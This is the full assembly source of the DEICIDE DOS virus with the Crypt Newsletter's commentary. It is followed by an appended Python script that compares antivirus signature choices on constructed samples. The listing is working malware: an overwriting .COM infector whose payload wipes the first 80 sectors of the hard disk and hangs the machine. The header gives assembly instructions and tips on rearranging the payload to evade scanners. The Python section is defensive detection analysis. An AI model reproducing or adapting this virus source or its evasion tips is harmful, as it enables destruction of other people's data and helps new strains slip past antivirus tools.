;***************************************************************************
; Source code of the DEICIDE Virus, original author: Glen Benton
; Assemble with A86 - Sanitized, English-ized and spruced up for inclusion
; in Crypt Newsletter #7. The Crypt reader will also notice the
; DEICIDE listing has NO declarative red tape - no org's, no assume
; cs,ds,es stuff, no start/ends pairs or proc labels. For the average
; reader, this means TASM and MASM will choke if you try to get them to
; assemble this as is. A86 doesn't need it, as Isaacson is fond of saying,
; and this listing can be assembled directly to a .COM file
; without the need of a linker.
;
; DEICIDE virus is a kamikaze overwriting .COM infector, with a length
; of 666 bytes in its original state. With A86, you get 665 bytes, which, we
; assume, ruins the 'aesthetics' of things just a bit. (Try adding a NOP
; to the listing if this bugs you too much.) Anyway, on call DEICIDE
; jumps right to the root directory where it looks for any .COM file
; except COMMAND.COM to infect.
;
; If all files are infected, and DEICIDE is not on the C drive, it attempts to
; ruin it anyway. If all files in the root on C are infected, the fixed disk
; is destroyed, a message displayed and the computer hung.
; If a program is successfully overwritten, DEICIDE exits to DOS
; after displaying 'File corruption error.' If DEICIDE is trapped on
; a diskette that is write-protected, it will generate noxious 'Abort,
; Retry, Ignore, Fail' messages.
;
; You can work with DEICIDE quite easily by commenting out the destructive
; sequence and reassembling. Then it will merely mess up .COM's in
; your root directory. If you forget that you're using NDOS or 4DOS, DEICIDE
; will promptly foul your command processor and the operating system
; won't load properly when you reboot. In an interesting side note,
; removing the destructive payload of DEICIDE causes SCAN to lose sight of
; DEICIDE.
; (There's a simple poor man's method to a 'new' strain. Fool
; your friends who think you've written a virus from scratch.)
; The DEBUG script of DEICIDE has the destructive payload "rearranged" and
; is not, strictly speaking, identical to this listing. This has made
; that copy of DEICIDE (referred to in the scriptfile as DEICIDE2)
; functionally similar to the original, but
; still invisible to SCAN v85b and a number of other commercial products.
; The lesson to be learned here is that software developers shouldn't choose
; generic disk overwriting payloads as signatures for their scanners.
;
; I must confess I'm fascinated by the mind that went into creating DEICIDE.
; Even in 1990, the DEICIDE was more of a 'hard disk bomb' than a virus.
; Think a moment. How many files are in your root directory? How long before
; this sucker activated and spoiled your afternoon? Once? Twice? In
; any case, it still is an easily understood piece of code, enjoying its
; own unique charm. Enjoy looking at DEICIDE. Your virus pal, URNST KOUCH.
;***************************************************************************

Start_Prog:
        jmp short Start_Virus
        nop

Message db 0Dh,0Ah,'DEICIDE!'
        db 0Dh,0Ah
        db 0Dh,0Ah,'Glenn (666) says : BYE BYE HARDDISK!!'
        db 0Dh,0Ah
        db 0Dh,0Ah,'Next time be carufull with illegal stuff......$'

Start_Virus:
        mov ah,19h                      ; Get actual drive
        int 21h
        db 0A2h                         ; Mov [EA],al
        dw offset Infect_Drive
        db 0A2h                         ; A86 assembles this differently
        dw offset Actual_Drive          ; so put the original code here
        mov ah,47h                      ; Get actual directory
        mov dl,0
        mov si,offset Actual_Dir
        int 21h
        mov ah,1Ah                      ; stash DTA in safe place
        mov dx,offset New_DTA
        int 21h

Infect_Next:
        mov ah,3Bh                      ; DOS chdir function, go to root dir
        mov dx,offset Root_Dir
        int 21h
        mov ah,4Eh                      ; Search first .COM file
        mov cx,0
        mov dx,offset Search_Path       ; using file mask
        int 21h

Check_Command:
        mov al,'D'                      ; Check if 7th char is a 'D' (To prevent
        cmp [New_DTA+24h],al            ; infecting COMMAND.COM, causing
        jnz Check_Infect                ; noticeable boot failure)
        jmp short Search_Next
        nop

Check_Infect:
        mov ah,3Dh                      ; Open found file with write access
        mov al,2
        mov dx,offset New_DTA+1Eh
        int 21h
        mov File_Handle,ax              ; Save handle
        mov bx,ax
        mov ah,57h                      ; Get date/time of file
        mov al,0                        ; why, for Heaven's sake?
        int 21h
        mov File_Date,dx
        mov File_Time,cx
        call Go_Beg_File                ; Go to beginning of file
        mov ah,3Fh                      ; Read first 2 bytes
        mov cx,2
        mov dx,offset Read_Buf          ; into a comparison buffer
        int 21h
        mov al,byte ptr [Read_Buf+1]    ; now, take a look at the
        cmp al,offset Start_Virus-102h  ; buffer and the start of
        jnz Infect                      ; DEICIDE. Is it the
                                        ; jump? If not, infect file
        mov ah,3Eh                      ; Already infected, so close file
        int 21h

Search_Next:
        mov ah,4Fh                      ; Search next file function
        int 21h
        jnc Check_Command               ; No error - try this file
        mov al,Infect_Drive             ; Skip to next drive,
        cmp al,0
        jnz No_A_Drive
        inc al
No_A_Drive:
        inc al
        cmp al,3                        ; Is the drive C:?
        jnz No_Destroy                  ;
                                        ; if it is and haven't been
                                        ; able to infect
        mov al,2                        ; Overwrite first 80 sectors,
        mov bx,0                        ; BUMMER!
        mov cx,50h                      ; BUMMER!
        mov dx,0                        ; BUMMER!
        int 26h                         ; BUMMER!
        mov ah,9                        ; Show silly message
        mov dx,offset Message
        int 21h
Lock_System:
        jmp short Lock_System           ; lock up the system so the poor fool
                                        ; has to start reloading right away
No_Destroy:
        mov dl,al                       ; New actual drive
        mov ah,0Eh
        mov Infect_Drive,dl             ; Save drive number.
        int 21h
        jmp Infect_Next

Infect:
        call Go_Beg_File                ; call seek routine
        mov ah,40h                      ; Write DEICIDE to the file
        mov cx,offset End_Virus-100h    ; right over the top, starting
        mov dx,100h                     ; at the beginning, thus messing
        int 21h                         ; up everything
        mov ah,57h                      ; Restore date/time of file
        mov al,1                        ; why, for God's sake? You
        mov cx,File_Time                ; think no one will notice
        mov dx,File_Date                ; file is destroyed?
        int 21h
        mov ah,3Eh                      ; Close file, let's be neat
        int 21h
        mov dl,byte ptr [Actual_Drive]  ; Back to original drive
        mov ah,0Eh
        int 21h
        mov ah,3Bh                      ; And original dir
        mov dx,offset Actual_Dir
        int 21h
        mov ah,9                        ; Show 'File corruption error.'
        mov dx,offset Quit_Message      ; when destroyed, infected
        int 21h                         ; program misfires and DEICIDE
                                        ; executes so user may be placated
        int 20h                         ; Exit back to DOS

Go_Beg_File:
        mov ah,42h                      ; Procedure: seek to start of file
        mov al,0
        mov cx,0
        mov dx,0
        int 21h
        ret

File_Date       dw (?)
File_Time       dw (?)
File_Handle     dw (?)
Infect_Drive    db (?)
Root_Dir        db '\',0
Search_Path     db '*.COM',0
Read_Buf        db 2 dup (?)
Actual_Drive    db (?)
Quit_Message    db 'File corruption error.',0Dh,0Ah,'$'
New_DTA         db 2Bh dup (?)
Actual_Dir      db 40h dup (?)
                db 'This experimental virus was written by Glenn Benton to '
                db 'see if I can make a virus while learning machinecode for '
                db '2,5 months. (C) 10-23-1990 by Glenn. I keep on going '
                db 'making virusses.'
End_Virus:
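The header note makes one detection-engineering point worth seeing in code: SCAN lost DEICIDE as soon as the destructive payload was rearranged, because the scanner keyed on a generic disk-overwrite sequence. The script below is an added example, not part of the Crypt Newsletter listing or of DEICIDE itself. It contrasts two signature choices over constructed sample files (byte strings built inline, not real binaries): a "generic payload" signature made of the standard 8086 encodings of the listing's mov cx,50h / mov dx,0 / int 26h instructions, and a "specific text" signature taken from the banner the virus carries verbatim. The sample names, the DISKINIT stand-in for a legitimate disk utility, and the reordered variant are all assumptions constructed for this example.

```python
"""
Added example (not from the Crypt Newsletter listing or DEICIDE):
compare a generic payload signature with a specific text signature
when scanning constructed sample files for a DEICIDE-style infector.
"""

# Generic signature: standard 8086 encodings of three instructions that
# appear in the listing's destructive sequence, in the listing's order:
#   B9 50 00   mov cx,50h
#   BA 00 00   mov dx,0
#   CD 26      int 26h   (DOS absolute disk write)
GENERIC_PAYLOAD_SIG = bytes.fromhex("B9 50 00 BA 00 00 CD 26")

# Specific signature: text DEICIDE stores verbatim in its data area.
# Rearranging the payload code leaves this string untouched.
SPECIFIC_TEXT_SIG = b"Glenn (666) says : BYE BYE HARDDISK!!"


def build_samples() -> dict:
    """Constructed stand-ins for files a scanner might meet (not real programs)."""
    banner = b"\r\nDEICIDE!\r\n\r\n" + SPECIFIC_TEXT_SIG + b"\r\n"

    # "original": banner followed by the payload bytes in the listing's order.
    original = banner + GENERIC_PAYLOAD_SIG

    # "variant": same banner, but mov dx,0 now precedes mov cx,50h, which is
    # the kind of rearrangement the newsletter says hid DEICIDE2 from SCAN.
    variant = banner + bytes.fromhex("BA 00 00 B9 50 00 CD 26")

    # "disk_tool": a constructed legitimate utility that also writes 80
    # sectors from sector 0 via int 26h, then exits with int 20h.
    disk_tool = b"DISKINIT v1.0 (constructed sample)\r\n" + GENERIC_PAYLOAD_SIG + b"\xCD\x20"

    # "clean": an ordinary .COM program that prints a string and exits
    # (mov ah,9 / mov dx,010Eh / int 21h / int 20h, then the string).
    clean = b"\xB4\x09\xBA\x0E\x01\xCD\x21\xCD\x20Hello, world$"

    return {"original": original, "variant": variant,
            "disk_tool": disk_tool, "clean": clean}


def scan(data: bytes, signatures: dict) -> list:
    """Return the names of every signature whose bytes occur in `data`."""
    return [name for name, sig in signatures.items() if sig in data]


def evaluate(signatures: dict) -> dict:
    """Scan every constructed sample; map sample name -> list of hits."""
    return {name: scan(blob, signatures) for name, blob in build_samples().items()}


GENERIC = {"int26h_overwrite": GENERIC_PAYLOAD_SIG}
SPECIFIC = {"deicide_banner": SPECIFIC_TEXT_SIG}

if __name__ == "__main__":
    for label, sigs in (("generic payload signature", GENERIC),
                        ("banner text signature", SPECIFIC)):
        print(label)
        for sample, hits in evaluate(sigs).items():
            verdict = "HIT " + ",".join(hits) if hits else "clean"
            print(f"  {sample:10s} -> {verdict}")
```

Run as a script, the generic signature flags the original and the constructed DISKINIT tool (a false positive) while missing the reordered variant (a false negative); the banner signature flags both DEICIDE samples and nothing else. Real scanners combine several such checks, but the asymmetry is the point the newsletter makes: a sequence any disk utility may legitimately contain is a poor identifier for one specific virus.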